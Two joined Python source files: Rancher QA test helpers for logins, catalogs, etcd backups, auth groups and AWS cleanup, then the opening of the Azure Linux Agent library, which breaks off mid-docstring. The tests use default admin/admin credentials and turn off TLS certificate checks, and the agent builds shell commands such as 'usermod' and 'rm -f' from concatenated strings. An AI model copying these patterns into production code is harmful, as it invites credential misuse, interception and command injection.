CATTLE_AUTH_URL = \ RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login" r = requests.post(CATTLE_AUTH_URL, json={ 'username': 'admin', 'password': 'admin', 'responseType': 'json', }, verify=False) print(r.json()) token = r.json()['token'] print(token) # Change admin password client = rancher.Client(url=RANCHER_SERVER_URL + "/v3", token=token, verify=False) admin_user = client.list_user(username="admin").data admin_user[0].setpassword(newPassword=ADMIN_PASSWORD) # Set server-url settings serverurl = client.list_setting(name="server-url").data client.update(serverurl[0], value=RANCHER_SERVER_URL) return token def validate_create_catalog(token, 
catalog_name, branch, url, permission=True): """ This function validates if the user has the permission to create a global catalog. :param token: user's token :param catalog_name: the name of the catalog :param branch: the branch of the git repo :param url: the url of the git repo :param permission: boolean value, True if the user can create catalog :return: the catalog object or None """ client = get_client_for_token(token) if not permission: with pytest.raises(ApiError) as e: client.create_catalog(name=catalog_name, branch=branch, url=url) error_msg = "user with no permission should receive 403: Forbidden" error_code = e.value.error.code error_status = e.value.error.status assert error_status == 403 and error_code == 'Forbidden', error_msg return None else: try: client.create_catalog(name=catalog_name, branch=branch, url=url) except ApiError as e: assert False, "user with permission should receive no exception:" \ + str(e.error.status) + " " + e.error.code catalog_list = client.list_catalog(name=catalog_name).data assert len(catalog_list) == 1 return catalog_list[0] def generate_template_global_role(name, new_user_default=False, template=None): """ generate a template that is used for creating a global role""" if template is None: template = TEMPLATE_MANAGE_CATALOG template = deepcopy(template) if new_user_default: template["newUserDefault"] = "true" else: template["newUserDefault"] = "false" if name is None: name = random_name() template["name"] = name return template def wait_for_backup_to_active(cluster, backupname, timeout=DEFAULT_TIMEOUT): start = time.time() etcdbackups = cluster.etcdBackups(name=backupname) assert len(etcdbackups) == 1 etcdbackupdata = etcdbackups['data'] etcdbackupstate = etcdbackupdata[0]['state'] while etcdbackupstate != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) etcdbackups = cluster.etcdBackups(name=backupname) assert len(etcdbackups) == 1 etcdbackupdata = etcdbackups['data'] etcdbackupstate = etcdbackupdata[0]['state'] print("BACKUP STATE") print(etcdbackupstate) return etcdbackupstate def wait_for_backup_to_delete(cluster, backupname, timeout=DEFAULT_TIMEOUT): start = time.time() etcdbackups = cluster.etcdBackups(name=backupname) while len(etcdbackups) == 1: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for backup to be deleted") time.sleep(.5) etcdbackups = cluster.etcdBackups(name=backupname) def validate_backup_create(namespace, backup_info, backup_mode=None): p_client = namespace["p_client"] ns = namespace["ns"] cluster = namespace["cluster"] name = random_test_name("default") if not hasattr(cluster, 'rancherKubernetesEngineConfig'): assert False, "Cluster is not of type RKE" con = [{"name": "test1", "image": TEST_IMAGE}] backup_info["workload"] = p_client.create_workload(name=name, containers=con, namespaceId=ns.id, daemonSetConfig={}) validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name, len(get_schedulable_nodes(cluster))) host = "test" + str(random_int(10000, 99999)) + ".com" namespace["host"] = host path = "/name.html" rule = {"host": host, "paths": [{"workloadIds": [backup_info["workload"].id], "targetPort": "80"}]} p_client.create_ingress(name=name, namespaceId=ns.id, rules=[rule]) validate_ingress(p_client, cluster, [backup_info["workload"]], host, path) # Perform Backup backup = cluster.backupEtcd() backup_info["backupname"] = backup['metadata']['name'] wait_for_backup_to_active(cluster, 
backup_info["backupname"]) # Get all the backup info etcdbackups = cluster.etcdBackups(name=backup_info["backupname"]) backup_info["etcdbackupdata"] = etcdbackups['data'] backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id'] if backup_mode == "s3": backupfileurl = backup_info["etcdbackupdata"][0]['filename'] # Check the backup filename exists in S3 parseurl = urlparse(backupfileurl) backup_info["backupfilename"] = os.path.basename(parseurl.path) backup_found = AmazonWebServices().s3_backup_check( backup_info["backupfilename"]) assert backup_found, "the backup was not found in the S3 bucket" elif backup_mode == 'filesystem': for node in namespace['nodes']: if 'etcd' not in node.roles: continue get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots' response = node.execute_command(get_filesystem_snapshots)[0] assert backup_info["etcdbackupdata"][0]['filename'] in response, \ "The filename doesn't match any of the files locally" return namespace, backup_info def validate_backup_restore(namespace, backup_info): p_client = namespace["p_client"] ns = namespace["ns"] client = get_user_client() cluster = namespace["cluster"] name = random_test_name("default") host = namespace["host"] path = "/name.html" con = [{"name": "test1", "image": TEST_IMAGE}] # Create workload after backup testworkload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id) validate_workload(p_client, testworkload, "deployment", ns.name) # Perform Restore cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"]) # After restore, validate cluster validate_cluster(client, cluster, intermediate_state="updating", check_intermediate_state=True, skipIngresscheck=False) # Verify the ingress created before taking the snapshot validate_ingress(p_client, cluster, [backup_info["workload"]], host, path) # Verify the workload created after getting a snapshot does not exist # after restore workload_list = p_client.list_workload(uuid=testworkload.uuid).data print(len(workload_list)) assert len(workload_list) == 0, "workload shouldn't exist after restore" return namespace, backup_info def validate_backup_delete(namespace, backup_info, backup_mode=None): client = get_user_client() cluster = namespace["cluster"] client.delete( cluster.etcdBackups(name=backup_info["backupname"])['data'][0] ) wait_for_backup_to_delete(cluster, backup_info["backupname"]) assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \ "backup shouldn't be listed in the Cluster backups" if backup_mode == "s3": # Check the backup reference is deleted in Rancher and S3 backup_found = AmazonWebServices().s3_backup_check( backup_info["backupfilename"]) assert_message = "The backup should't exist in the S3 bucket" assert backup_found is False, assert_message elif backup_mode == 'filesystem': for node in namespace['nodes']: if 'etcd' not in node.roles: continue get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots' response = node.execute_command(get_filesystem_snapshots)[0] filename = backup_info["etcdbackupdata"][0]['filename'] assert filename not in response, \ "The file still exist in the filesystem" def apply_crd(ns, file, kubectl_context): return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def get_crd(ns, crd_name, kubectl_context): return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def delete_crd(ns, file, kubectl_context): return 
execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def prepare_auth_data(): name = \ os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource", AUTH_PROVIDER.lower() + ".json") with open(name) as reader: auth_data = reader.read() raw = json.loads(auth_data).get("nested_group_info") nested_group["auth_info"] = raw.copy() nested_group["users"] = raw.get("users") raw.pop("users") nested_group["group_dic"] = raw nested_group["groups"] = raw.keys() def is_nested(): """ check if the provided groups are nested groups, return True if at least one of the groups contains other groups """ count = 0 for user, group in nested_group["group_dic"].items(): if len(group) == 0: count += 1 if count < len(nested_group["group_dic"]): return True return False def get_group(nested=False): """ return a group or a nested group""" if nested: # return the name of a group that contains at least one other group for item in nested_group["groups"]: if len(nested_group["group_dic"].get(item).get("users")) == 0: pass sub_groups = nested_group["group_dic"].get(item).get("groups") if len(sub_groups) == 0: pass for g in sub_groups: if len(nested_group["group_dic"].get(g).get("users")) > 0: return item assert False, "cannot find any valid nested group" else: # return the name of a group that has at least one direct user for group in nested_group["groups"]: if len(nested_group["group_dic"].get(group).get("users")) > 0: return group assert False, "cannot find any valid non-nested group" def get_user_by_group(group, nested=False): """ return the list of uses in the group or nested group if nested is False, return the direct users in the group; otherwise, return all users including those from nested groups """ def get_user_in_nested_group(group, source): if group == "": return [] users = source["group_dic"].get(group).get("users") for sub_group in source["group_dic"].get(group).get("groups"): temp = get_user_in_nested_group(sub_group, source) for user in temp: if user not in users: users.append(user) return users if nested: users = get_user_in_nested_group(group, nested_group) assert len(users) > 0, "no user in the group" else: users = nested_group["group_dic"].get(group).get("users") assert users is not None, "no user in the group" print("group: {}, users: {}".format(group, users)) return users def get_a_group_and_a_user_not_in_it(nested=False): """ return a group or a nested group and a user that is not in the group""" all_users = nested_group["users"] for group in nested_group["groups"]: group_users = get_user_by_group(group, nested) for user in all_users: if user not in group_users: print("group: {}, user not in it: {}".format(group, user)) return group, user assert False, "cannot find a group and a user not in it" def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200): """ get the group's principal id from the auth provider""" headers = {'Authorization': 'Bearer ' + token} r = requests.post(CATTLE_AUTH_PRINCIPAL_URL, json={'name': group_name, 'principalType': 'group', 'responseType': 'json'}, verify=False, headers=headers) assert r.status_code == expected_status return r.json()['data'][0]["id"] def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL): """ login with the user account from the auth provider, and return the user token""" r = requests.post(login_url, json={ 'username': username, 'password': password, 'responseType': 'json', }, verify=False) assert r.status_code in [200, 201] 
return r.json() def validate_service_discovery(workload, scale, p_client=None, ns=None, testclient_pods=None): expected_ips = [] pods = p_client.list_pod(workloadId=workload["id"]).data assert len(pods) == scale for pod in pods: expected_ips.append(pod["status"]["podIp"]) host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id) for pod in testclient_pods: validate_dns_entry(pod, host, expected_ips) def auth_get_project(): return auth_rbac_data["project"] def auth_get_namespace(): return auth_rbac_data["namespace"] def auth_get_user_token(username): if username in auth_rbac_data["users"].keys(): return auth_rbac_data["users"][username].token return None def add_role_to_user(user, role): """this function adds a user from the auth provider to given cluster""" admin_client, cluster = get_global_admin_client_and_cluster() project = auth_get_project() ns = auth_get_namespace() if not (project and ns): project, ns = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-test-auth")) auth_rbac_data["project"] = project auth_rbac_data["namespace"] = ns if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]: assign_members_to_project(admin_client, user, project, role) else: assign_members_to_cluster(admin_client, user, cluster, role) auth_rbac_data["users"][user.username] = user def auth_resource_cleanup(): """ remove the project and namespace created for the AUTH tests""" client, cluster = get_global_admin_client_and_cluster() client.delete(auth_rbac_data["project"]) auth_rbac_data["project"] = None auth_rbac_data["ns"] = None for username, user in auth_rbac_data["users"].items(): user_crtbs = client.list_cluster_role_template_binding(userId=user.id) for crtb in user_crtbs: client.delete(crtb) class WebsocketLogParse: """ the class is used for receiving and parsing the message received from the websocket """ def __init__(self): self.lock = Lock() self._last_message = '' def receiver(self, socket, skip): """ run a thread to receive and save the message from the web socket :param socket: the socket connection :param skip: if True skip the first char of the received message """ while True and socket.connected: try: data = socket.recv() # the message from the kubectl contains an extra char if skip: data = data[1:] if len(data) < 5: pass data = base64.b64decode(data).decode() self.lock.acquire() self._last_message += data self.lock.release() except websocket.WebSocketConnectionClosedException: print("Connection closed") break except websocket.WebSocketProtocolException as wpe: print("Error: {}".format(wpe)) break @staticmethod def start_thread(target, args): thread = Thread(target=target, args=args) thread.daemon = True thread.start() time.sleep(1) @property def last_message(self): return self._last_message @last_message.setter def last_message(self, value): self.lock.acquire() self._last_message = value self.lock.release() def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT): start = time.time() cluster = client.list_cluster(name=cluster_name).data cluster_count = len(cluster) while cluster_count != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for cluster to get deleted") time.sleep(.5) cluster = client.list_cluster(name=cluster_name).data cluster_count = len(cluster) def create_connection(url, subprotocols): """ create a webscoket connection and check if it is connected :param url: the url to connect to :param subprotocols: the list of subprotocols :return: """ ws = websocket.create_connection( url=url, sslopt={"cert_reqs": 
ssl.CERT_NONE}, subprotocols=subprotocols, timeout=10, cookie="R_SESS=" + USER_TOKEN ) assert ws.connected, "failed to build the websocket" return ws def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT): start = time.time() hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data assert len(hpalist) == 1 hpa = hpalist[0] while hpa.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data assert len(hpas) == 1 hpa = hpas[0] return hpa def create_pv_pvc(client, ns, nfs_ip, cluster_client): pv_object = create_pv(cluster_client, nfs_ip) pvc_name = random_test_name("pvc") pvc_config = {"accessModes": ["ReadWriteOnce"], "name": pvc_name, "volumeId": pv_object.id, "namespaceId": ns.id, "storageClassId": "", "resources": {"requests": {"storage": "10Gi"}} } pvc_object = client.create_persistent_volume_claim(pvc_config) pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300) return pv_object, pvc_object def create_pv(client, nfs_ip): pv_name = random_test_name("pv") pv_config = {"type": "persistentVolume", "accessModes": ["ReadWriteOnce"], "name": pv_name, "nfs": {"readOnly": "false", "type": "nfsvolumesource", "path": NFS_SERVER_MOUNT_PATH, "server": nfs_ip }, "capacity": {"storage": "50Gi"} } pv_object = client.create_persistent_volume(pv_config) capacitydict = pv_object['capacity'] assert capacitydict['storage'] == '50Gi' assert pv_object['type'] == 'persistentVolume' return pv_object def delete_resource_in_AWS_by_prefix(resource_prefix): """ :param resource_prefix: the prefix of resource name :return: None """ # delete nodes of both local and custom clusters node_filter = [{ 'Name': 'tag:Name', 'Values': [resource_prefix + "-*"] }] nodes = AmazonWebServices().get_nodes(filters=node_filter) if nodes is None: print("deleting the following instances: None") else: print("deleting the following instances: {}" .format([node.public_ip_address for node in nodes])) AmazonWebServices().delete_nodes(nodes) # delete load balancer and target groups tg_list = [] lb_list = [] lb_names = [resource_prefix + '-nlb', resource_prefix + '-multinode-nlb', resource_prefix + '-k3s-nlb'] for name in lb_names: lb_arn = AmazonWebServices().get_lb(name) if lb_arn is not None: lb_list.append(lb_arn) res = AmazonWebServices().get_target_groups(lb_arn) tg_list.extend(res) print("deleting the following load balancers: {}".format(lb_list)) print("deleting the following target groups: {}".format(tg_list)) for lb in lb_list: AmazonWebServices().delete_lb(lb) for tg in tg_list: AmazonWebServices().delete_target_group(tg) # delete rds db_name = resource_prefix + "-multinode-db" print("deleting the database: {}".format(db_name)) AmazonWebServices().delete_db(db_name) # delete the route 53 record record_name = resource_prefix + ".qa.rancher.space." 
print("deleting the route53 record: {}".format(record_name)) AmazonWebServices().delete_route_53_record(record_name) print("deletion is done") return None def configure_cis_requirements(aws_nodes, profile, node_roles, client, cluster): i = 0 if profile == 'rke-cis-1.4': for aws_node in aws_nodes: aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1") aws_node.execute_command("sudo sysctl -w kernel.panic=10") aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1") if node_roles[i] == ["etcd"]: aws_node.execute_command("sudo useradd etcd") docker_run_cmd = \ get_custom_host_registration_cmd(client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 elif profile == 'rke-cis-1.5': for aws_node in aws_nodes: aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1") aws_node.execute_command("sudo sysctl -w kernel.panic=10") aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0") aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1") aws_node.execute_command("sudo sysctl -w " "kernel.keys.root_maxbytes=25000000") if node_roles[i] == ["etcd"]: aws_node.execute_command("sudo groupadd -g 52034 etcd") aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd") docker_run_cmd = \ get_custom_host_registration_cmd(client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 time.sleep(5) cluster = validate_cluster_state(client, cluster) # the workloads under System project to get active time.sleep(20) if profile == 'rke-cis-1.5': create_kubeconfig(cluster) network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml" account_update_file = DATA_SUBDIR + "/account_update.yaml" items = execute_kubectl_cmd("get namespaces -A")["items"] all_ns = [item["metadata"]["name"] for item in items] for ns in all_ns: execute_kubectl_cmd("apply -f {0} -n {1}". format(network_policy_file, ns)) execute_kubectl_cmd('patch serviceaccount default' ' -n {0} -p "$(cat {1})"'. format(ns, account_update_file)) return cluster
WaagentLib.py
#!/usr/bin/env python # # Azure Linux Agent # # Copyright 2015 Microsoft Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Requires Python 2.6+ and Openssl 1.0+ # # Implements parts of RFC 2131, 1541, 1497 and # http://msdn.microsoft.com/en-us/library/cc227282%28PROT.10%29.aspx # http://msdn.microsoft.com/en-us/library/cc227259%28PROT.13%29.aspx # import crypt import random import base64 try: import httplib as httplibs except ImportError: import http.client as httplibs import os import os.path import platform import pwd import re import shutil import socket try: import SocketServer as SocketServers except ImportError: import socketserver as SocketServers import string import subprocess import sys import tempfile import textwrap import threading import time import traceback import xml.dom.minidom import inspect import zipfile import json import datetime import xml.sax.saxutils from distutils.version import LooseVersion if not hasattr(subprocess, 'check_output'): def check_output(*popenargs, **kwargs): r"""Backport from subprocess module from python 2.7""" if 'stdout' in kwargs: raise ValueError('stdout argument not allowed, it will be overridden.') process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs) output, unused_err = process.communicate() retcode = process.poll() if retcode: cmd = kwargs.get("args") if cmd is None: cmd = popenargs[0] raise subprocess.CalledProcessError(retcode, cmd, output=output) return output # Exception classes used by this module. class CalledProcessError(Exception): def __init__(self, returncode, cmd, output=None): self.returncode = returncode self.cmd = cmd self.output = output def __str__(self): return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) subprocess.check_output = check_output subprocess.CalledProcessError = CalledProcessError GuestAgentName = "WALinuxAgent" GuestAgentLongName = "Azure Linux Agent" GuestAgentVersion = "WALinuxAgent-2.0.16" ProtocolVersion = "2012-11-30" # WARNING this value is used to confirm the correct fabric protocol. Config = None WaAgent = None DiskActivated = False Openssl = "openssl" Children = [] ExtensionChildren = [] VMM_STARTUP_SCRIPT_NAME = 'install' VMM_CONFIG_FILE_NAME = 'linuxosconfiguration.xml' global RulesFiles RulesFiles = ["/lib/udev/rules.d/75-persistent-net-generator.rules", "/etc/udev/rules.d/70-persistent-net.rules"] VarLibDhcpDirectories = ["/var/lib/dhclient", "/var/lib/dhcpcd", "/var/lib/dhcp"] EtcDhcpClientConfFiles = ["/etc/dhcp/dhclient.conf", "/etc/dhcp3/dhclient.conf"] global LibDir LibDir = "/var/lib/waagent" global provisioned provisioned = False global provisionError provisionError = None HandlerStatusToAggStatus = {"installed": "Installing", "enabled": "Ready", "unintalled": "NotReady", "disabled": "NotReady"} WaagentConf = """\ # # Azure Linux Agent Configuration # Role.StateConsumer=None # Specified program is invoked with the argument "Ready" when we report ready status # to the endpoint server. 
Role.ConfigurationConsumer=None # Specified program is invoked with XML file argument specifying role configuration. Role.TopologyConsumer=None # Specified program is invoked with XML file argument specifying role topology. Provisioning.Enabled=y # Provisioning.DeleteRootPassword=y # Password authentication for root account will be unavailable. Provisioning.RegenerateSshHostKeyPair=y # Generate fresh host key pair. Provisioning.SshHostKeyPairType=rsa # Supported values are "rsa", "dsa" and "ecdsa". Provisioning.MonitorHostName=y # Monitor host name changes and publish changes via DHCP requests. ResourceDisk.Format=y # Format if unformatted. If 'n', resource disk will not be mounted. ResourceDisk.Filesystem=ext4 # Typically ext3 or ext4. FreeBSD images should use 'ufs2' here. ResourceDisk.MountPoint=/mnt/resource # ResourceDisk.EnableSwap=n # Create and use swapfile on resource disk. ResourceDisk.SwapSizeMB=0 # Size of the swapfile. LBProbeResponder=y # Respond to load balancer probes if requested by Azure. Logs.Verbose=n # Enable verbose logs OS.RootDeviceScsiTimeout=300 # Root device timeout in seconds. OS.OpensslPath=None # If "None", the system default version is used. """ README_FILENAME = "DATALOSS_WARNING_README.txt" README_FILECONTENT = """\ WARNING: THIS IS A TEMPORARY DISK. Any data stored on this drive is SUBJECT TO LOSS and THERE IS NO WAY TO RECOVER IT. Please do not use this disk for storing any personal or application data. For additional details to please refer to the MSDN documentation at : http://msdn.microsoft.com/en-us/library/windowsazure/jj672979.aspx """ ############################################################ # BEGIN DISTRO CLASS DEFS ############################################################ ############################################################ # AbstractDistro ############################################################ class AbstractDistro(object): """ AbstractDistro defines a skeleton neccesary for a concrete Distro class. Generic methods and attributes are kept here, distribution specific attributes and behavior are to be placed in the concrete child named distroDistro, where distro is the string returned by calling python platform.linux_distribution()[0]. So for CentOS the derived class is called 'centosDistro'. """ def __init__(self): """ Generic Attributes go here. These are based on 'majority rules'. This __init__() may be called or overriden by the child. 
""" self.agent_service_name = os.path.basename(sys.argv[0]) self.selinux = None self.service_cmd = '/usr/sbin/service' self.ssh_service_restart_option = 'restart' self.ssh_service_name = 'ssh' self.ssh_config_file = '/etc/ssh/sshd_config' self.hostname_file_path = '/etc/hostname' self.dhcp_client_name = 'dhclient' self.requiredDeps = ['route', 'shutdown', 'ssh-keygen', 'useradd', 'usermod', 'openssl', 'sfdisk', 'fdisk', 'mkfs', 'sed', 'grep', 'sudo', 'parted'] self.init_script_file = '/etc/init.d/waagent' self.agent_package_name = 'WALinuxAgent' self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log", '/etc/resolv.conf'] self.agent_files_to_uninstall = ["/etc/waagent.conf", "/etc/logrotate.d/waagent"] self.grubKernelBootOptionsFile = '/etc/default/grub' self.grubKernelBootOptionsLine = 'GRUB_CMDLINE_LINUX_DEFAULT=' self.getpidcmd = 'pidof' self.mount_dvd_cmd = 'mount' self.sudoers_dir_base = '/etc' self.waagent_conf_file = WaagentConf self.shadow_file_mode = 0o600 self.shadow_file_path = "/etc/shadow" self.dhcp_enabled = False def isSelinuxSystem(self): """ Checks and sets self.selinux = True if SELinux is available on system. """ if self.selinux == None: if Run("which getenforce", chk_err=False): self.selinux = False else: self.selinux = True return self.selinux def isSelinuxRunning(self): """ Calls shell command 'getenforce' and returns True if 'Enforcing'. """ if self.isSelinuxSystem(): return RunGetOutput("getenforce")[1].startswith("Enforcing") else: return False def setSelinuxEnforce(self, state): """ Calls shell command 'setenforce' with 'state' and returns resulting exit code. """ if self.isSelinuxSystem(): if state: s = '1' else: s = '0' return Run("setenforce " + s) def setSelinuxContext(self, path, cn): """ Calls shell 'chcon' with 'path' and 'cn' context. Returns exit result. """ if self.isSelinuxSystem(): if not os.path.exists(path): Error("Path does not exist: {0}".format(path)) return 1 return Run('chcon ' + cn + ' ' + path) def setHostname(self, name): """ Shell call to hostname. Returns resulting exit code. """ return Run('hostname ' + name) def publishHostname(self, name): """ Set the contents of the hostname file to 'name'. Return 1 on failure. """ try: r = SetFileContents(self.hostname_file_path, name) for f in EtcDhcpClientConfFiles: if os.path.exists(f) and FindStringInFile(f, r'^[^#]*?send\s*host-name.*?(<hostname>|gethostname[(,)])') == None: r = ReplaceFileContentsAtomic('/etc/dhcp/dhclient.conf', "send host-name \"" + name + "\";\n" + "\n".join(filter(lambda a: not a.startswith("send host-name"), GetFileContents('/etc/dhcp/dhclient.conf').split( '\n')))) except: return 1 return r def installAgentServiceScriptFiles(self): """ Create the waagent support files for service installation. Called by registerAgentService() Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def registerAgentService(self): """ Calls installAgentService to create service files. Shell exec service registration commands. (e.g. chkconfig --add waagent) Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def uninstallAgentService(self): """ Call service subsystem to remove waagent script. Abstract Virtual Function. Over-ridden in concrete Distro classes. 
""" pass def unregisterAgentService(self): """ Calls self.stopAgentService and call self.uninstallAgentService() """ self.stopAgentService() self.uninstallAgentService() def startAgentService(self): """ Service call to start the Agent service """ return Run(self.service_cmd + ' ' + self.agent_service_name + ' start') def stopAgentService(self): """ Service call to stop the Agent service """ return Run(self.service_cmd + ' ' + self.agent_service_name + ' stop', False) def restartSshService(self): """ Service call to re(start) the SSH service """ sshRestartCmd = self.service_cmd + " " + self.ssh_service_name + " " + self.ssh_service_restart_option retcode = Run(sshRestartCmd) if retcode > 0: Error("Failed to restart SSH service with return code:" + str(retcode)) return retcode def checkPackageInstalled(self, p): """ Query package database for prescence of an installed package. Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def checkPackageUpdateable(self, p): """ Online check if updated package of walinuxagent is available. Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def deleteRootPassword(self): """ Generic root password removal. """ filepath = "/etc/shadow" ReplaceFileContentsAtomic(filepath, "root:*LOCK*:14600::::::\n" + "\n".join( filter(lambda a: not a.startswith("root:"), GetFileContents(filepath).split('\n')))) os.chmod(filepath, self.shadow_file_mode) if self.isSelinuxSystem(): self.setSelinuxContext(filepath, 'system_u:object_r:shadow_t:s0') Log("Root password deleted.") return 0 def changePass(self, user, password): Log("Change user password") crypt_id = Config.get("Provisioning.PasswordCryptId") if crypt_id is None: crypt_id = "6" salt_len = Config.get("Provisioning.PasswordCryptSaltLength") try: salt_len = int(salt_len) if salt_len < 0 or salt_len > 10: salt_len = 10 except (ValueError, TypeError): salt_len = 10 return self.chpasswd(user, password, crypt_id=crypt_id, salt_len=salt_len) def chpasswd(self, username, password, crypt_id=6, salt_len=10): passwd_hash = self.gen_password_hash(password, crypt_id, salt_len) cmd = "usermod -p '{0}' {1}".format(passwd_hash, username) ret, output = RunGetOutput(cmd, log_cmd=False) if ret != 0: return "Failed to set password for {0}: {1}".format(username, output) def gen_password_hash(self, password, crypt_id, salt_len): collection = string.ascii_letters + string.digits salt = ''.join(random.choice(collection) for _ in range(salt_len)) salt = "${0}${1}".format(crypt_id, salt) return crypt.crypt(password, salt) def load_ata_piix(self): return WaAgent.TryLoadAtapiix() def unload_ata_piix(self): """ Generic function to remove ata_piix.ko. """ return WaAgent.TryUnloadAtapiix() def deprovisionWarnUser(self): """ Generic user warnings used at deprovision. """ print("WARNING! Nameserver configuration in /etc/resolv.conf will be deleted.") def deprovisionDeleteFiles(self): """ Files to delete when VM is deprovisioned """ for a in VarLibDhcpDirectories: Run("rm -f " + a + "/*") # Clear LibDir, remove nameserver and root bash history for f in os.listdir(LibDir) + self.fileBlackList: try: os.remove(f) except: pass return 0 def uninstallDeleteFiles(self): """ Files to delete when agent is uninstalled. """ for f in self.agent_files_to_uninstall: try: os.remove(f) except: pass return 0 def checkDependencies(self): """ Generic dependency check. Return 1 unless all dependencies are satisfied. 
""" if self.checkPackageInstalled('NetworkManager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 try: m = __import__('pyasn1') except ImportError: Error(GuestAgentLongName + " requires python-pyasn1 for your Linux distribution.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def packagedInstall(self, buildroot): """ Called from setup.py for use by RPM. Copies generated files waagent.conf, under the buildroot. """ if not os.path.exists(buildroot + '/etc'): os.mkdir(buildroot + '/etc') SetFileContents(buildroot + '/etc/waagent.conf', MyDistro.waagent_conf_file) if not os.path.exists(buildroot + '/etc/logrotate.d'): os.mkdir(buildroot + '/etc/logrotate.d') SetFileContents(buildroot + '/etc/logrotate.d/waagent', WaagentLogrotate) self.init_script_file = buildroot + self.init_script_file # this allows us to call installAgentServiceScriptFiles() if not os.path.exists(os.path.dirname(self.init_script_file)): os.mkdir(os.path.dirname(self.init_script_file)) self.installAgentServiceScriptFiles() def RestartInterface(self, iface, max_retry=3): for retry in range(1, max_retry + 1): ret = Run("ifdown " + iface + " && ifup " + iface) if ret == 0: return Log("Failed to restart interface: {0}, ret={1}".format(iface, ret)) if retry < max_retry: Log("Retry restart interface in 5 seconds") time.sleep(5) def CreateAccount(self, user, password, expiration, thumbprint): return CreateAccount(user, password, expiration, thumbprint) def DeleteAccount(self, user): return DeleteAccount(user) def Install(self): return Install() def mediaHasFilesystem(self, dsk): if len(dsk) == 0: return False if Run("LC_ALL=C fdisk -l " + dsk + " | grep Disk"): return False return True def mountDVD(self, dvd, location): return RunGetOutput(self.mount_dvd_cmd + ' ' + dvd + ' ' + location) def GetHome(self): return GetHome() def getDhcpClientName(self): return self.dhcp_client_name def initScsiDiskTimeout(self): """ Set the SCSI disk timeout when the agent starts running """ self.setScsiDiskTimeout() def setScsiDiskTimeout(self): """ Iterate all SCSI disks(include hot-add) and set their timeout if their value are different from the OS.RootDeviceScsiTimeout """ try: scsiTimeout = Config.get("OS.RootDeviceScsiTimeout") for diskName in [disk for disk in os.listdir("/sys/block") if disk.startswith("sd")]: self.setBlockDeviceTimeout(diskName, scsiTimeout) except: pass def setBlockDeviceTimeout(self, device, timeout): """ Set SCSI disk timeout by set /sys/block/sd*/device/timeout """ if timeout != None and device: filePath = "/sys/block/" + device + "/device/timeout" if (GetFileContents(filePath).splitlines()[0].rstrip() != timeout): SetFileContents(filePath, timeout) Log("SetBlockDeviceTimeout: Update the device " + device + " with timeout " + timeout) def waitForSshHostKey(self, path): """ Provide a dummy waiting, since by default, ssh host key is created by waagent and the key should already been created. """ if (os.path.isfile(path)): return True else: Error("Can't find host key: {0}".format(path)) return False def isDHCPEnabled(self): return self.dhcp_enabled def stopDHCP(self): """ Stop the system DHCP client so that the agent can bind on its port. If the distro has set dhcp_enabled to True, it will need to provide an implementation of this method. """ raise NotImplementedError('stopDHCP method missing') def startDHCP(self): """ Start the system DHCP client. 
